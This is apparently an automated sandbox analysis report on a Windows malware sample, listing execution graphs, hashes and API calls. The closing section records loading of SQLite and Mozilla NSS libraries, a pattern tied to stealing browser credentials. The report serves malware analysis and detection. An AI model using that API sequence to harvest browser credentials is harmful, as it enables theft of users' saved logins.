                                                              0x00344919
                                                              0x0034491b
                                                              0x0034491d
                                                              0x0034491f
                                                              0x00344920
                                                              0x00344922
                                                              0x00344926
                                                              0x00344927
                                                              0x0034492a
                                                              0x0034492c
                                                              0x0034492d
                                                              0x0034492e
                                                              0x00344932
                                                              0x00344934
                                                              0x00344938
                                                              0x0034493b
                                                              0x0034493e
                                                              0x0034493f
                                                              0x00344942
                                                              0x00344944
                                                              0x00344946
                                                              0x00344949
                                                              0x0034494b
                                                              0x0034494c
                                                              0x0034494d
                                                              0x0034494f
                                                              0x00344951
                                                              0x00344953
                                                              0x00344956
                                                              0x00344958
                                                              0x0034495a
                                                              0x0034495c
                                                              0x0034495e
                                                              0x00344962
                                                              0x00344964
                                                              0x00344967

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.217553481.0000000000342000.00000002.00020000.sdmp, Offset: 00340000, based on PE: true
                                                              • Associated: 00000000.00000002.217528390.0000000000340000.00000002.00020000.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_340000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a6bfd4fa80772ca141bc7b3d0508b3ba8a05644a52fbc4c4bfedcdfd0380b8d
                                                              • Instruction ID: 61e74da5e34d1db125c093070139d8c2dc594371d224c7db6b2e89c4adaf37ff
                                                              • Opcode Fuzzy Hash: 3a6bfd4fa80772ca141bc7b3d0508b3ba8a05644a52fbc4c4bfedcdfd0380b8d
                                                              • Instruction Fuzzy Hash: 6B11886240F3C65FCB238FB48CA95D0BF70AE4711472E02DBC8C1CE4A7D6286A59D722
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:12.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:73
                                                              Total number of Limit Nodes:3

                                                              Graph

                                                              execution_graph 26316 15163f0 26317 1516400 26316->26317 26321 151652f 26317->26321 26325 1516468 26317->26325 26318 1516411 26322 1516534 26321->26322 26323 1516599 26322->26323 26329 1516ae0 26322->26329 26323->26318 26326 15164a2 26325->26326 26327 1516599 26326->26327 26328 1516ae0 5 API calls 26326->26328 26327->26318 26328->26327 26330 1516aed 26329->26330 26331 1516b27 26330->26331 26333 151693c 26330->26333 26331->26323 26334 1516947 26333->26334 26336 1517418 26334->26336 26337 1516a34 26334->26337 26336->26336 26338 1516a3f 26337->26338 26345 1519a91 26338->26345 26349 1519aa0 26338->26349 26339 1517495 26343 151b890 LoadLibraryExW CreateWindowExW GetModuleHandleW 26339->26343 26344 151b878 LoadLibraryExW CreateWindowExW GetModuleHandleW 26339->26344 26340 15174c0 26340->26336 26343->26340 26344->26340 26346 1519ace 26345->26346 26347 1519b9a KiUserCallbackDispatcher 26346->26347 26348 1519b9f 26346->26348 26347->26348 26350 1519ace 26349->26350 26351 1519b9a KiUserCallbackDispatcher 26350->26351 26352 1519b9f 26350->26352 26351->26352 26352->26352 26361 1516e20 DuplicateHandle 26362 1516eb6 26361->26362 26363 146d01c 26364 146d034 26363->26364 26365 146d08e 26364->26365 26371 151b264 26364->26371 26375 151dfb0 26364->26375 26378 151de90 26364->26378 26384 151de7f 26364->26384 26391 151b258 26364->26391 26372 151b26f 26371->26372 26395 151b29c 26372->26395 26374 151dfc7 26374->26365 26376 151dfc7 26375->26376 26377 151b29c SetWindowLongW 26375->26377 26376->26365 26377->26376 26382 151def0 SetWindowLongW 26378->26382 26405 151dee0 26378->26405 26379 151deb6 26380 151b264 SetWindowLongW 26379->26380 26381 151dec2 26380->26381 26381->26365 26382->26379 26385 151de90 26384->26385 26389 151def0 SetWindowLongW 26385->26389 26390 151dee0 SetWindowLongW 26385->26390 26386 151deb6 26387 151b264 SetWindowLongW 26386->26387 26388 151dec2 26387->26388 26388->26365 26389->26386 26390->26386 26392 151b25d 26391->26392 26393 151b29c SetWindowLongW 26392->26393 26394 151dfc7 26393->26394 26394->26365 26396 151b2a7 26395->26396 26397 151e219 26396->26397 26399 151def0 26396->26399 26402 151b284 26399->26402 26403 151df20 SetWindowLongW 26402->26403 26404 151df08 26403->26404 26404->26397 26406 151df08 26405->26406 26407 151b284 SetWindowLongW 26405->26407 26406->26379 26407->26406 26353 73d72f0 26354 73d730e 26353->26354 26357 73d56dc 26354->26357 26356 73d7345 26358 73d8e10 LoadLibraryA 26357->26358 26360 73d8eec 26358->26360

                                                              Executed Functions

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0151BE6E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: d38f91081f3fb38a455fe89ebc04f65873fbac0308214d68b498caf9013fab69
                                                              • Instruction ID: 94836afc9a515e9b1971ba72cc1381999b47113e991aa52c57e1ae7f4de428e9
                                                              • Opcode Fuzzy Hash: d38f91081f3fb38a455fe89ebc04f65873fbac0308214d68b498caf9013fab69
                                                              • Instruction Fuzzy Hash: E3814770A00B068FE725DF2AD45179ABBF1FF88204F108A2DD54ADBA54DB35E845CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 468 151dccd-151dd3e 472 151dd40-151dd46 468->472 473 151dd49-151dd50 468->473 472->473 474 151dd52-151dd58 473->474 475 151dd5b-151dd93 473->475 474->475 476 151dd9b-151ddfa CreateWindowExW 475->476 477 151de03-151de3b 476->477 478 151ddfc-151de02 476->478 482 151de48 477->482 483 151de3d-151de40 477->483 478->477 484 151de49 482->484 483->482 484->484
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0151DDEA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 1de0e15a4943b6c1bcf84233bb7001e57568320c26707ea82804193f9fc55c7c
                                                              • Instruction ID: 1d51c323786b8e64eb9b44dd3c842af24b7da46fe23c420dd9a60ac885bde5fe
                                                              • Opcode Fuzzy Hash: 1de0e15a4943b6c1bcf84233bb7001e57568320c26707ea82804193f9fc55c7c
                                                              • Instruction Fuzzy Hash: CC51C3B5D00308DFDB15CF99C884ADEBBB5FF88314F24862AE519AB214D7749845CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 485 151b24b-151dd3e 487 151dd40-151dd46 485->487 488 151dd49-151dd50 485->488 487->488 489 151dd52-151dd58 488->489 490 151dd5b-151dd93 488->490 489->490 491 151dd9b-151ddfa CreateWindowExW 490->491 492 151de03-151de3b 491->492 493 151ddfc-151de02 491->493 497 151de48 492->497 498 151de3d-151de40 492->498 493->492 499 151de49 497->499 498->497 499->499
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0151DDEA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: c1d7810c3b025fad3f7f2af06173e24429da7b33e881612da990e9b9140bf288
                                                              • Instruction ID: 27e909a77725f440ca577b3bc9b42de504763654eaf1acec45fe14e45d126798
                                                              • Opcode Fuzzy Hash: c1d7810c3b025fad3f7f2af06173e24429da7b33e881612da990e9b9140bf288
                                                              • Instruction Fuzzy Hash: BE51C2B5D003089FDB15CF9AC884ADEBBB5FF88314F24862AE819AB214D7749845CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 500 151b24c-151dd3e 502 151dd40-151dd46 500->502 503 151dd49-151dd50 500->503 502->503 504 151dd52-151dd58 503->504 505 151dd5b-151ddfa CreateWindowExW 503->505 504->505 507 151de03-151de3b 505->507 508 151ddfc-151de02 505->508 512 151de48 507->512 513 151de3d-151de40 507->513 508->507 514 151de49 512->514 513->512 514->514
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0151DDEA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 9061f9d5bd701c19426e6c476aff42ced2e6dfefaeacd17881e47f21fbea5442
                                                              • Instruction ID: 7eeba855d3ab86bc175c5b2707246ef1e84359de100485e8fd8624bab965e62a
                                                              • Opcode Fuzzy Hash: 9061f9d5bd701c19426e6c476aff42ced2e6dfefaeacd17881e47f21fbea5442
                                                              • Instruction Fuzzy Hash: 9E51D3B5D00308DFDB15CF9AC884ADEBBB5FF48314F24852AE419AB214D7749845CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 515 73d8e04-73d8e67 517 73d8e69-73d8e73 515->517 518 73d8ea0-73d8eea LoadLibraryA 515->518 517->518 519 73d8e75-73d8e77 517->519 525 73d8eec-73d8ef2 518->525 526 73d8ef3-73d8f24 518->526 520 73d8e79-73d8e83 519->520 521 73d8e9a-73d8e9d 519->521 523 73d8e85 520->523 524 73d8e87-73d8e96 520->524 521->518 523->524 524->524 527 73d8e98 524->527 525->526 530 73d8f34 526->530 531 73d8f26-73d8f2a 526->531 527->521 533 73d8f35 530->533 531->530 532 73d8f2c 531->532 532->530 533->533
                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(?), ref: 073D8EDA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.782317819.00000000073D0000.00000040.00000001.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_73d0000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: e11947742d4802da9be6a278be7284e755ca4dfb84342ed38015a1b7a4e64539
                                                              • Instruction ID: 946524fb5443bf591729ed475bf781352e7fd92fb6374435cf5b6df1699899ca
                                                              • Opcode Fuzzy Hash: e11947742d4802da9be6a278be7284e755ca4dfb84342ed38015a1b7a4e64539
                                                              • Instruction Fuzzy Hash: 413147B5D102599FEB14CFA8E884BDEBBF5FB08314F108529E819E7240D774A845CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 534 73d56dc-73d8e67 536 73d8e69-73d8e73 534->536 537 73d8ea0-73d8eea LoadLibraryA 534->537 536->537 538 73d8e75-73d8e77 536->538 544 73d8eec-73d8ef2 537->544 545 73d8ef3-73d8f24 537->545 539 73d8e79-73d8e83 538->539 540 73d8e9a-73d8e9d 538->540 542 73d8e85 539->542 543 73d8e87-73d8e96 539->543 540->537 542->543 543->543 546 73d8e98 543->546 544->545 549 73d8f34 545->549 550 73d8f26-73d8f2a 545->550 546->540 552 73d8f35 549->552 550->549 551 73d8f2c 550->551 551->549 552->552
                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(?), ref: 073D8EDA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.782317819.00000000073D0000.00000040.00000001.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_73d0000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: fc4a6b480b92dba4394b00d886dc0ea72eb8827604d4792ba2a0ba7185ce31ea
                                                              • Instruction ID: 66e2a5cfc29e45de96560a2bc48bd36beb2ae734caedf94763e0ad84e8bac173
                                                              • Opcode Fuzzy Hash: fc4a6b480b92dba4394b00d886dc0ea72eb8827604d4792ba2a0ba7185ce31ea
                                                              • Instruction Fuzzy Hash: E63136B1D102599FDB14CFA8E845BDEBBB5FB08314F148529E819A7340D778A845CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1173 1516e19-1516e1e 1174 1516e20-1516eb4 DuplicateHandle 1173->1174 1175 1516eb6-1516ebc 1174->1175 1176 1516ebd-1516eda 1174->1176 1175->1176
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01516EA7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 0fc072960b6d66fe7f1929bbe16397e0fedf7468a3081ed9f620d7b901babffd
                                                              • Instruction ID: 2f272f1dc3bab81121fbc23e39756b4c41216da2e04c4cc1231a1aa7462c295d
                                                              • Opcode Fuzzy Hash: 0fc072960b6d66fe7f1929bbe16397e0fedf7468a3081ed9f620d7b901babffd
                                                              • Instruction Fuzzy Hash: 2A21C6B5D00258EFDB10CFA9D884ADEBBF4FB48324F14851AE914A7350D375A954CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1179 1516e20-1516eb4 DuplicateHandle 1180 1516eb6-1516ebc 1179->1180 1181 1516ebd-1516eda 1179->1181 1180->1181
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01516EA7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: adae052628512f5ea9d7c7829ca67edffb9b530b7b48a69d478deead89bf35d4
                                                              • Instruction ID: 65380af93c6b8446c5297e0f1928a4a825cfccfd7ec900c73ab9a2161ad6d676
                                                              • Opcode Fuzzy Hash: adae052628512f5ea9d7c7829ca67edffb9b530b7b48a69d478deead89bf35d4
                                                              • Instruction Fuzzy Hash: 2521D3B5D00248AFDB10CFAAD884ADEFBF8FB48324F14851AE914A7350D375A954CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1184 151c08a-151c08c 1185 151c085-151c089 1184->1185 1186 151c08e-151c0d0 1184->1186 1185->1184 1188 151c0d2-151c0d5 1186->1188 1189 151c0d8-151c107 LoadLibraryExW 1186->1189 1188->1189 1190 151c110-151c12d 1189->1190 1191 151c109-151c10f 1189->1191 1191->1190
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0151BEE9,00000800,00000000,00000000), ref: 0151C0FA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 803b4e8d2ae9186fcb59f21861961c544c932d2eb8dd0129390a11fe729d11ee
                                                              • Instruction ID: b6ac4efa935a7ede8cadad2223b3bc8289d80f3eee2b36e85540821c82af7935
                                                              • Opcode Fuzzy Hash: 803b4e8d2ae9186fcb59f21861961c544c932d2eb8dd0129390a11fe729d11ee
                                                              • Instruction Fuzzy Hash: 6B214AB6C003499FDB10CFAAC444ADEFBF4FB89314F14841AE515AB210C375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1194 151b110-151c0d0 1196 151c0d2-151c0d5 1194->1196 1197 151c0d8-151c107 LoadLibraryExW 1194->1197 1196->1197 1198 151c110-151c12d 1197->1198 1199 151c109-151c10f 1197->1199 1199->1198
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0151BEE9,00000800,00000000,00000000), ref: 0151C0FA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 96a8a731594322522d77d94484da165d4e692027b50529efbe6cf113578e42fc
                                                              • Instruction ID: 881a32251d59243e1bc5ab7ffa64d870449777c018cab0c1589d92ae2c1b1eb0
                                                              • Opcode Fuzzy Hash: 96a8a731594322522d77d94484da165d4e692027b50529efbe6cf113578e42fc
                                                              • Instruction Fuzzy Hash: 9A11F4B69002099FDB10CFAAC444B9EFBF4FB49214F14841AE519AB200C375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1202 151b284-151df8a SetWindowLongW 1204 151df93-151dfa7 1202->1204 1205 151df8c-151df92 1202->1205 1205->1204
                                                              APIs
                                                              • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0151DF7D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              • Opcode ID: 993840c8ee4c14352db2d16310b600548860519c26ac2a4b12a74369e92c0cfa
                                                              • Instruction ID: 4dbe5a9eb3ce3c444ee352295235fcc13117ab60d9c6f891ec908c914ed421de
                                                              • Opcode Fuzzy Hash: 993840c8ee4c14352db2d16310b600548860519c26ac2a4b12a74369e92c0cfa
                                                              • Instruction Fuzzy Hash: F71103B59003089FDB10DF99D488BDEBBF8FB48324F20841AE919A7700D374AA44CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1207 151be08-151be48 1208 151be50-151be7b GetModuleHandleW 1207->1208 1209 151be4a-151be4d 1207->1209 1210 151be84-151be98 1208->1210 1211 151be7d-151be83 1208->1211 1209->1208 1211->1210
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0151BE6E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: febed8f06c0cef4b5203edf2491294ce7e6684710e6fd9b6f1b16f1216644eac
                                                              • Instruction ID: 0ec36a25c33e677b5aefc03066624a4caaa46ec4c6a8ce22c16844178ebcc194
                                                              • Opcode Fuzzy Hash: febed8f06c0cef4b5203edf2491294ce7e6684710e6fd9b6f1b16f1216644eac
                                                              • Instruction Fuzzy Hash: A611DFB6C006498FDB10CF9AC444ADEFBF4FB88224F14851AD929A7610D375A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1213 151df18-151df8a SetWindowLongW 1214 151df93-151dfa7 1213->1214 1215 151df8c-151df92 1213->1215 1215->1214
                                                              APIs
                                                              • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0151DF7D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.773069166.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1510000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              • Opcode ID: 3d371b48d8cf4420585ac149643ef122395b46da84ee86e2510c85789a54cb12
                                                              • Instruction ID: 425debb1f0bd293eb8671061404b7379e066e511c6c918e899b6924e81378fbb
                                                              • Opcode Fuzzy Hash: 3d371b48d8cf4420585ac149643ef122395b46da84ee86e2510c85789a54cb12
                                                              • Instruction Fuzzy Hash: EF1115B58003499FDB10DF99D488BDEBBF8FB48324F20841AE919A7300D374AA45CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.772170543.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_137d000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d479595d07819f6fd8a3c390a15f1b32100cc4d2402d48b9ce6669eb3163c686
                                                              • Instruction ID: d76cce94bc25abd6f0006a85da01f5b3135ddf7ce073408bf3ac683d3eb0d53d
                                                              • Opcode Fuzzy Hash: d479595d07819f6fd8a3c390a15f1b32100cc4d2402d48b9ce6669eb3163c686
                                                              • Instruction Fuzzy Hash: F62136B2504204DFDB15DF54D8C0B66BB65FF84328F24C569E9091B606C73AE846CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.772500710.000000000146D000.00000040.00000001.sdmp, Offset: 0146D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_146d000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba1028ae2798e4a9e2b21b1240338aa0c1973c13bdf599409b7a661614f71882
                                                              • Instruction ID: 3ae7340e9defcf02eceb73e4c2e565749682fa5f40f0851c50f5e7b186c75e93
                                                              • Opcode Fuzzy Hash: ba1028ae2798e4a9e2b21b1240338aa0c1973c13bdf599409b7a661614f71882
                                                              • Instruction Fuzzy Hash: 7B2103B1A04244DFDB15CF54D8C0B26BB69FB8425CF24C56AE9894B356C336D847CA62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.772500710.000000000146D000.00000040.00000001.sdmp, Offset: 0146D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_146d000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f91b51884f2122c98ea33da7d8e65af6c222dc49f8762c2b2b89b69edc01f704
                                                              • Instruction ID: 5c0ea68d9495d53f640f3ae023421511a464d70387858a50fe1af7d0462680d4
                                                              • Opcode Fuzzy Hash: f91b51884f2122c98ea33da7d8e65af6c222dc49f8762c2b2b89b69edc01f704
                                                              • Instruction Fuzzy Hash: B32150755093808FDB12CF24D594B16BF71EB46218F28C5DBD8898B667C33A984ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.772170543.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_137d000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4288b8d1924a243b74452ed9894bda5974195c5eafdb5ecf84050c0b22077c9
                                                              • Instruction ID: 570f4d8f2258ac373a3f6fe9c524ee4faa870bc393510e3f8ba1b49f6afd1096
                                                              • Opcode Fuzzy Hash: a4288b8d1924a243b74452ed9894bda5974195c5eafdb5ecf84050c0b22077c9
                                                              • Instruction Fuzzy Hash: F711BE76404280DFCB12CF54D9C4B56BF72FF84324F28C6A9D8091B616C33AE45ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.772170543.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_137d000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 761fbf58638fcd37378e226361093b57c3bd7cdeafeabd265bdc9d05cb24ad5b
                                                              • Instruction ID: bdf9e0a58ffd0a4a1d981bb157e6780fc0fc600816697141e31a09eac1143558
                                                              • Opcode Fuzzy Hash: 761fbf58638fcd37378e226361093b57c3bd7cdeafeabd265bdc9d05cb24ad5b
                                                              • Instruction Fuzzy Hash: 01F0F476200604AFD3249F0AD985C27FBADEFC4674359C49AE84A9B612C671EC42CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.772170543.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_137d000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f3f82c741d33468e56ff94b7d56f48a1573d08046609a3898fe6a70445e787d
                                                              • Instruction ID: cd6cdbca5be79b9bf8f4c5b0ed16baab2a5187101bf09985b6615fa92d88733f
                                                              • Opcode Fuzzy Hash: 8f3f82c741d33468e56ff94b7d56f48a1573d08046609a3898fe6a70445e787d
                                                              • Instruction Fuzzy Hash: F4F04F75104780AFD3258F16C984C23BFB9EF86670719C48DE8895B362C634FC42CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.782317819.00000000073D0000.00000040.00000001.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_73d0000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2faa2eaf6f103ebfec67cdc66580b56503a3b55e69c1743b4e26376ea96a9650
                                                              • Instruction ID: 223fafee7f3a06bc7a05fdac44e26498262df84f349e13accd664da3e2a755c3
                                                              • Opcode Fuzzy Hash: 2faa2eaf6f103ebfec67cdc66580b56503a3b55e69c1743b4e26376ea96a9650
                                                              • Instruction Fuzzy Hash: C22145B1E01219DFDB00DFA4E898BEEBBF0AB49304F14446AD515B7390D7785A88CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              APIs
                                                              • memset.MSVCRT ref: 004419A0
                                                              • wcscpy.MSVCRT ref: 004419B7
                                                              • memset.MSVCRT ref: 004419EA
                                                              • wcscpy.MSVCRT ref: 00441A00
                                                              • wcscat.MSVCRT ref: 00441A11
                                                              • wcscpy.MSVCRT ref: 00441A37
                                                              • wcscat.MSVCRT ref: 00441A48
                                                              • wcscpy.MSVCRT ref: 00441A6F
                                                              • wcscat.MSVCRT ref: 00441A80
                                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
                                                              • LoadLibraryW.KERNEL32(sqlite3.dll,?,00000104,00000000), ref: 00441AB9
                                                              • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000104,00000000), ref: 00441AC7
                                                              • LoadLibraryW.KERNEL32(nss3.dll,?,00000104,00000000), ref: 00441AD7
                                                              • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
                                                              • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
